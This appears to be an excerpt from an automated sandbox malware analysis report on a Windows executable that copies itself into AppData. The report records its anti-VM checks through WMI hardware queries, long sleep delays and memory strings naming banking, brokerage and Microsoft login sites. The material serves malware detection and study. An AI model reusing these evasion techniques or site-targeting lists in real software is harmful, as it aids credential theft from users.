                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 4CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 91D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: A3E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: B3E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: BA00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: CA00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: DA00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 2980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 2780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 8A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 9A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 9C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: AC00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: B000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: C000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: D000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 18C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 3300000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory allocated: 3130000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4462Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5415Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWindow / User API: threadDelayed 3460Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWindow / User API: threadDelayed 3030Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWindow / User API: threadDelayed 631
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWindow / User API: threadDelayed 5428
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 3748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 4462 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6288Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 7440Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 5720Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 2948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7852Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7768Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7644Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeThread delayed: delay time: 922337203685477
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: tmp3B70.tmp.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: tmp3B70.tmp.17.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: tmp3B70.tmp.17.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: tmp3B70.tmp.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: tmp3B70.tmp.17.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: VcihjWRO.exe, 00000011.00000002.2424162856.00000000016CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzv
                    Source: tmp3B70.tmp.17.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2323363497.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmp3B70.tmp.17.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: tmp3B70.tmp.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: tmp3B70.tmp.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.000000000301A000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.000000000366C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 